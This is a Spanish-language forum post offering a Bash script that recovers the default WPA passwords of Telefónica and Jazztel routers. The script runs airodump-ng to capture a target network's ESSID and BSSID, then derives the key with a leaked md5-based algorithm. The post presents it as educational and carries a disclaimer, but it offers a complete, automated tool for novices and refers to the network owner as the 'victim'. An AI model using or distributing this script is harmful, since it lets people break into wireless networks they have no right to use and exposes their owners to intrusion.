Hola buenas, como todos estaréis al corriente de que se filtrado el algoritmo de las contraseñas WAP de Telefónica y Jazztel, pues bien, me he descargado el script en Bash, que estaba hecho por a.s.r y lo he editado un poco (Pero el algoritmo esta intacto, solo he editado el paso de variables y he añadido unas cosas) y también le he añadido airodump-ng para que sea mas fácil saber la BSSID de la víctima (lo hice para noveles o para los que no se quieren romper la cabeza). Por último, yo no me hago responsable del uso que se le puede dar a terceros (También tengo el aviso en el script) porque quiero enseñar la facilidad de sacar estas contraseñas ahora (eso se encarga la parte de a.s.r) y si esta automatizado el proceso para saber las cosas necesarios en menos de 1 min ya tienes la contraseña (Esa es mi parte, hay muy poca iteración con el usario). Como el saber es libre, aquí tenéis el script
#/bin/bash/
#############################################################################################################################################
# Esta parte del script esta hecho por Afsoon (a excepción del algoritmo que esta implantado por a.s.r), yo no me hago responsable del uso # que se le puede dar a terceros, yo hago esto con fines didácticos, para mostrar la poca seguridad de los routers de Telefónica (WLAN_XXXX) # y Jazztel y con la facilidad que se sacan si el proceso se automatiza .
#############################################################################################################################################
#Variable de la interfaz que se deberá de escribir antes de iniciar el script
INTERFAZ=
# Se encarga de preguntar antes del inicio si ha escrito la interfaz para ejecutar airodump para saber la ESSID y BSSID
echo "Antes de ejecutar este script, ustede debe de haber"
echo "abierto el script y escrito en la variable INTERFAZ"
echo "su interfaz que se usará para airodump"
echo "si no lo ha hecho diga no ahora, escriba la interfaz"
echo "y vuelva a abrir el script y diga si"
echo "Ha escrito su interfaz [s]i\[n]o"
read opc
if [ $opc == "s" ]; then
# Esta parte mostrara el airodump para ver la BSSID y ESSID
clear
echo "Ahora se usara airodump, para saber la BSSID y ESSID al"
echo "que desea atacar. Usted puede parar el proceso cuando quiera"
echo "Cuando pare el proceso pasaremos a generar la contraseña"
echo "una vez obtenido los datos necesirarios que se dice a continuación"
echo "Se le abrira Gedit en paralelo a airodump"
echo "y copia el BSSID y ESSID de la víctima"
trap 'airodump' INT;
airodump()
{
# Ahora ejecuta el script que generara la contraseña pero con unas cuantas variaciones
# en el que hay un paso de variables por teclado
clear
echo CalcWLAN by a.s.r and some edited by Afsoon # NO HE EDITADO EL ALGORITMO
echo "Ahora se mostrara lo que debes de escribir"
echo "Inserte su ESSID"
echo "Por ejemplo WLAN_C58D"
read ESSID
echo "Inserte el BSSID"
echo "Por ejemplo 64:68:0C:C5:C5:90"
read BSSIDS
HEAD=$(echo -n "$ESSID" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$BSSIDS" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)
echo "La clave es $KEY"
exit
}
sudo airodump-ng $INTERFAZ
wait 2
gedit &
fi
if [ $opc == "n" ]; then
exit
fi
El funcionamiento del Script es muy simple:
1- Hace una pregunta para saber si has escrito la interfaz (si no se escribe poco hará el Script)
2- si se dice que si, se le dirá que se usara airodump y gedit, este último para apuntar la BSSID y ESSID y cuando acabe con el proceso se pasará a generar la contraseña
3- Cuando se mata el proceso de airodump y se haya copiado el BSSID y ESSID, se le pedirá que se ingrese los datos correspondientes y ya el algoritmo hace su trabajo y te muestra la contraseña.